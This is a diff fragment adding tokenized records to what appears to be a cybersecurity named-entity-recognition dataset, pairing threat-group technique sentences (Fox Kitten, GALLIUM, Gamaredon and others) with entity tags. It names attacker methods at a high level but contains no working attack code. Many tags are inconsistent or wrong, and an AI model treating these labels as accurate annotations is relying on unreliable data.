"lpupdate", + "to", + "appear", + "legitimate." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "named", + "binaries", + "and", + "configuration", + "files", + "svhost", + "and", + "dllhost", + "respectively", + "to", + "appear", + "legitimate." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "used", + "Volume", + "Shadow", + "Copy", + "to", + "access", + "credential", + "information", + "from", + "NTDS." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "used", + "tools", + "including", + "NMAP", + "to", + "conduct", + "broad", + "scanning", + "to", + "identify", + "open", + "ports." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "used", + "scripts", + "to", + "access", + "credential", + "information", + "from", + "the", + "KeePass", + "database." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "used", + "PowerShell", + "scripts", + "to", + "access", + "credential", + "data." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "used", + "protocol", + "tunneling", + "for", + "communication", + "and", + "RDP", + "activity", + "on", + "compromised", + "hosts", + "through", + "the", + "use", + "of", + "open", + "source", + "tools", + "such", + "as", + "ngrok", + "and", + "custom", + "tool", + "SSHMinion." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "B-Org", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Tool", + "I-Tool", + "B-Way" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "used", + "the", + "open", + "source", + "reverse", + "proxy", + "tools", + "including", + "FRPC", + "and", + "Go", + "Proxy", + "to", + "establish", + "connections", + "from", + "C2", + "to", + "local", + "servers." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "accessed", + "Registry", + "hives", + "ntuser.dat", + "and", + "UserClass.dat." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "used", + "RDP", + "to", + "log", + "in", + "and", + "move", + "laterally", + "in", + "the", + "target", + "environment." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "used", + "Angry", + "IP", + "Scanner", + "to", + "detect", + "remote", + "systems." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "used", + "valid", + "accounts", + "to", + "access", + "SMB", + "shares." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "used", + "the", + "PuTTY", + "and", + "Plink", + "tools", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "used", + "Scheduled", + "Tasks", + "for", + "persistence", + "and", + "to", + "load", + "and", + "execute", + "a", + "reverse", + "proxy", + "binary." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Tool", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "used", + "a", + "Twitter", + "account", + "to", + "communicate", + "with", + "ransomware", + "victims." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "installed", + "TightVNC", + "server", + "and", + "client", + "on", + "compromised", + "servers", + "and", + "endpoints", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "used", + "valid", + "credentials", + "with", + "various", + "services", + "during", + "lateral", + "movement." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "I-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "used", + "Amazon", + "Web", + "Services", + "to", + "host", + "C2." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Tool", + "O", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "installed", + "web", + "shells", + "on", + "compromised", + "hosts", + "to", + "maintain", + "access." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "used", + "cmd.exe", + "likely", + "as", + "a", + "password", + "changing", + "mechanism." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GALLIUM", + "used", + "WinRAR", + "to", + "compress", + "and", + "encrypt", + "stolen", + "data", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GALLIUM", + "has", + "used", + "stolen", + "certificates", + "to", + "sign", + "its", + "tools", + "including", + "those", + "from", + "Whizzimo", + "LLC." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-SecTeam" + ] + }, + { + "tokens": [ + "GALLIUM", + "used", + "DLL", + "side-loading", + "to", + "covertly", + "load", + "PoisonIvy", + "into", + "memory", + "on", + "the", + "victim", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GALLIUM", + "collected", + "data", + "from", + "the", + "victim's", + "local", + "system,", + "including", + "password", + "hashes", + "from", + "the", + "SAM", + "hive", + "in", + "the", + "Registry." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GALLIUM", + "created", + "high-privileged", + "domain", + "user", + "accounts", + "to", + "maintain", + "access", + "to", + "victim", + "networks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GALLIUM", + "used", + "Web", + "shells", + "and", + "HTRAN", + "for", + "C2", + "and", + "to", + "exfiltrate", + "data." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Tool", + "I-Tool", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Purp" + ] + }, + { + "tokens": [ + "GALLIUM", + "exploited", + "a", + "publicly-facing", + "servers", + "including", + "Wildfly/JBoss", + "servers", + "to", + "gain", + "access", + "to", + "the", + "network." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "GALLIUM", + "used", + "a", + "modified", + "version", + "of", + "HTRAN", + "to", + "redirect", + "connections", + "between", + "networks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "GALLIUM", + "has", + "used", + "VPN", + "services,", + "including", + "SoftEther", + "VPN,", + "to", + "access", + "and", + "maintain", + "persistence", + "in", + "victim", + "environments." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GALLIUM", + "ensured", + "each", + "payload", + "had", + "a", + "unique", + "hash,", + "including", + "by", + "using", + "different", + "types", + "of", + "packers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "GALLIUM", + "dropped", + "additional", + "tools", + "to", + "victims", + "during", + "their", + "operation,", + "including", + "portqry.exe,", + "a", + "renamed", + "cmd.exe", + "file,", + "winrar,", + "and", + "HTRAN." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-SamFile", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "GALLIUM", + "used", + "a", + "modified", + "version", + "of", + "Mimikatz", + "along", + "with", + "a", + "PowerShell-based", + "Mimikatz", + "to", + "dump", + "credentials", + "on", + "the", + "victim", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GALLIUM", + "has", + "used", + "PsExec", + "to", + "move", + "laterally", + "between", + "hosts", + "in", + "the", + "target", + "network." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GALLIUM", + "compressed", + "and", + "staged", + "files", + "in", + "multi-part", + "archives", + "in", + "the", + "Recycle", + "Bin", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GALLIUM", + "used", + "a", + "modified", + "version", + "of", + "HTRAN", + "in", + "which", + "they", + "obfuscated", + "strings", + "such", + "as", + "debug", + "messages", + "in", + "an", + "apparent", + "attempt", + "to", + "evade", + "detection." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GALLIUM", + "used", + "dumped", + "hashes", + "to", + "authenticate", + "to", + "other", + "machines", + "via", + "pass", + "the", + "hash." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GALLIUM", + "used", + "PowerShell", + "for", + "execution", + "to", + "assist", + "in", + "lateral", + "movement", + "as", + "well", + "as", + "for", + "dumping", + "credentials", + "stored", + "on", + "compromised", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GALLIUM", + "used", + "a", + "modified", + "version", + "of", + "NBTscan", + "to", + "identify", + "available", + "NetBIOS", + "name", + "servers", + "over", + "the", + "network", + "as", + "well", + "as", + "<code>ping</code>", + "to", + "identify", + "remote", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GALLIUM", + "used", + "a", + "renamed", + "cmd.exe", + "file", + "to", + "evade", + "detection." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GALLIUM", + "established", + "persistence", + "for", + "PoisonIvy", + "by", + "created", + "a", + "scheduled", + "task." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GALLIUM", + "used", + "<code>reg</code>", + "commands", + "to", + "dump", + "specific", + "hives", + "from", + "the", + "Windows", + "Registry,", + "such", + "as", + "the", + "SAM", + "hive,", + "and", + "obtain", + "password", + "hashes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "B-Purp", + "B-Features" + ] + }, + { + "tokens": [ + "GALLIUM", + "has", + "used", + "Taiwan-based", + "servers", + "that", + "appear", + "to", + "be", + "exclusive", + "to", + "GALLIUM." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Area", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "GALLIUM", + "packed", + "some", + "payloads", + "using", + "different", + "types", + "of", + "packers,", + "both", + "known", + "and", + "custom." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GALLIUM", + "used", + "<code>ipconfig", + "/all</code>", + "to", + "obtain", + "information", + "about", + "the", + "victim", + "network", + "configuration.", + "The", + "group", + "also", + "ran", + "a", + "modified", + "version", + "of", + "NBTscan", + "to", + "identify", + "available", + "NetBIOS", + "name", + "servers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GALLIUM", + "used", + "<code>netstat", + "-oan</code>", + "to", + "obtain", + "information", + "about", + "the", + "victim", + "network", + "connections." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GALLIUM", + "used", + "<code>whoami</code>", + "and", + "<code>query", + "user</code>", + "to", + "obtain", + "information", + "about", + "the", + "victim", + "user." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GALLIUM", + "has", + "used", + "a", + "variety", + "of", + "widely-available", + "tools,", + "which", + "in", + "some", + "cases", + "they", + "modified", + "to", + "add", + "functionality", + "and/or", + "subvert", + "antimalware", + "solutions." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GALLIUM", + "leveraged", + "valid", + "accounts", + "to", + "maintain", + "access", + "to", + "a", + "victim", + "network." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Tool", + "I-Tool", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GALLIUM", + "used", + "Web", + "shells", + "to", + "persist", + "in", + "victim", + "environments", + "and", + "assist", + "in", + "execution", + "and", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GALLIUM", + "used", + "the", + "Windows", + "command", + "shell", + "to", + "execute", + "commands." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GALLIUM", + "used", + "WMI", + "for", + "execution", + "to", + "assist", + "in", + "lateral", + "movement", + "as", + "well", + "as", + "for", + "installing", + "tools", + "across", + "multiple", + "assets." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-OffAct", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GCMAN", + "uses", + "Putty", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GCMAN", + "uses", + "VNC", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GOLD", + "SOUTHFIELD", + "has", + "executed", + "base64", + "encoded", + "PowerShell", + "scripts", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GOLD", + "SOUTHFIELD", + "has", + "distributed", + "ransomware", + "by", + "backdooring", + "software", + "installers", + "via", + "a", + "strategic", + "web", + "compromise", + "of", + "the", + "site", + "hosting", + "Italian", + "WinRAR." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GOLD", + "SOUTHFIELD", + "has", + "exploited", + "Oracle", + "WebLogic", + "vulnerabilities", + "for", + "initial", + "compromise." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Exp", + "O", + "B-Exp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GOLD", + "SOUTHFIELD", + "has", + "used", + "publicly-accessible", + "RDP", + "and", + "remote", + "management", + "and", + "monitoring", + "(RMM)", + "servers", + "to", + "gain", + "access", + "to", + "victim", + "machines." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "B-Tool", + "B-Way", + "O", + "B-Tool", + "B-Way", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GOLD", + "SOUTHFIELD", + "has", + "conducted", + "malicious", + "spam", + "(malspam)", + "campaigns", + "to", + "gain", + "access", + "to", + "victim's", + "machines." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "B-OffAct", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GOLD", + "SOUTHFIELD", + "has", + "staged", + "and", + "executed", + "PowerShell", + "scripts", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GOLD", + "SOUTHFIELD", + "has", + "used", + "the", + "cloud-based", + "remote", + "management", + "and", + "monitoring", + "tool", + "\"ConnectWise", + "Control\"", + "to", + "deploy", + "REvil." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "GOLD", + "SOUTHFIELD", + "has", + "used", + "the", + "remote", + "monitoring", + "and", + "management", + "tool", + "ConnectWise", + "to", + "obtain", + "screen", + "captures", + "from", + "victim's", + "machines." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GOLD", + "SOUTHFIELD", + "has", + "breached", + "Managed", + "Service", + "Providers", + "(MSP's)", + "to", + "deliver", + "malware", + "to", + "MSP", + "customers." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "O" + ] + }, + { + "tokens": [ + "Gallmaker", + "has", + "used", + "WinZip,", + "likely", + "to", + "archive", + "data", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gallmaker", + "attempted", + "to", + "exploit", + "Microsoft’s", + "DDE", + "protocol", + "in", + "order", + "to", + "gain", + "access", + "to", + "victim", + "machines", + "and", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gallmaker", + "sent", + "victims", + "a", + "lure", + "document", + "with", + "a", + "warning", + "that", + "asked", + "victims", + "to", + "“enable", + "content”", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gallmaker", + "obfuscated", + "shellcode", + "used", + "during", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gallmaker", + "used", + "PowerShell", + "to", + "download", + "additional", + "payloads", + "and", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gallmaker", + "sent", + "emails", + "with", + "malicious", + "Microsoft", + "Office", + "documents", + "attached." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "has", + "deployed", + "scripts", + "on", + "compromised", + "systems", + "that", + "automatically", + "scan", + "for", + "interesting", + "documents." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "has", + "used", + "modules", + "that", + "automatically", + "upload", + "gathered", + "documents", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "has", + "obfuscated", + ".NET", + "executables", + "by", + "inserting", + "junk", + "code." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "has", + "used", + "obfuscated", + "or", + "encrypted", + "scripts." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "has", + "compiled", + "the", + "source", + "code", + "for", + "a", + "downloader", + "directly", + "on", + "the", + "infected", + "system", + "using", + "the", + "built-in", + "<code>Microsoft.CSharp.CSharpCodeProvider</code>", + "class." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "malware", + "can", + "insert", + "malicious", + "macros", + "into", + "documents", + "using", + "a", + "<code>Microsoft.Office.Interop</code>", + "object." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "has", + "used", + "tools", + "to", + "delete", + "files", + "and", + "folders", + "from", + "victims'", + "desktops", + "and", + "profiles." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "has", + "collected", + "files", + "from", + "infected", + "systems", + "and", + "uploaded", + "them", + "to", + "a", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "malware", + "has", + "collected", + "Microsoft", + "Office", + "documents", + "from", + "mapped", + "network", + "drives." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "Gamaredon", + "Group", + "file", + "stealer", + "has", + "the", + "capability", + "to", + "steal", + "data", + "from", + "newly", + "connected", + "logical", + "volumes", + "on", + "a", + "system,", + "including", + "USB", + "drives." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "tools", + "decrypted", + "additional", + "payloads", + "from", + "the", + "C2.", + "Gamaredon", + "Group", + "has", + "also", + "decoded", + "base64-encoded", + "source", + "code", + "of", + "a", + "downloader." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "has", + "delivered", + "macros", + "which", + "can", + "tamper", + "with", + "Microsoft", + "Office", + "security", + "settings." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "has", + "registered", + "multiple", + "domains", + "to", + "facilitate", + "payload", + "staging", + "and", + "C2." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "has", + "incorporated", + "dynamic", + "DNS", + "domains", + "in", + "its", + "infrastructure." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Tool", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "Gamaredon", + "Group", + "file", + "stealer", + "can", + "transfer", + "collected", + "files", + "to", + "a", + "hardcoded", + "C2", + "server." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "tools", + "can", + "delete", + "files", + "used", + "during", + "an", + "operation." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "macros", + "can", + "scan", + "for", + "Microsoft", + "Word", + "and", + "Excel", + "files", + "to", + "inject", + "with", + "additional", + "malicious", + "macros.", + "Gamaredon", + "Group", + "has", + "also", + "used", + "its", + "backdoors", + "to", + "automatically", + "list", + "interesting", + "files", + "(such", + "as", + "Office", + "documents)", + "found", + "on", + "a", + "system." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "B-HackOrg", + 